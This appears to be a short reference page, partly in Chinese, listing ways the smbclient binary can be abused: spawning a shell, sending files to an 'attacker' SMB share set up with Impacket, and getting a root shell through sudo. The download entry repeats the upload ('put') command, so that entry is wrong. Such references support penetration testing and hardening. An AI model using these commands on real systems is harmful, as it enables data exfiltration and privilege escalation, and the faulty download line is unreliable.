.. / smbclient

shell

用来生成一个交互式的系统shell。

• smbclient '\\attacker\share'
  !/bin/sh
  

file-upload

上传文件到外部。

• Install [Impacket](https://github.com/SecureAuthCorp/impacket) and run sudo smbserver.py share /tmp on the attacker box to collect the file.

  smbclient '\\attacker\share' -c 'put 要发送的文件 where_to_save'
  

file-download

下载远程文件。

• Install [Impacket](https://github.com/SecureAuthCorp/impacket) and run sudo smbserver.py share /tmp on the attacker box to send the file.

  smbclient '\\attacker\share' -c 'put 要发送的文件 where_to_save'
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• sudo smbclient '\\attacker\share'
  !/bin/sh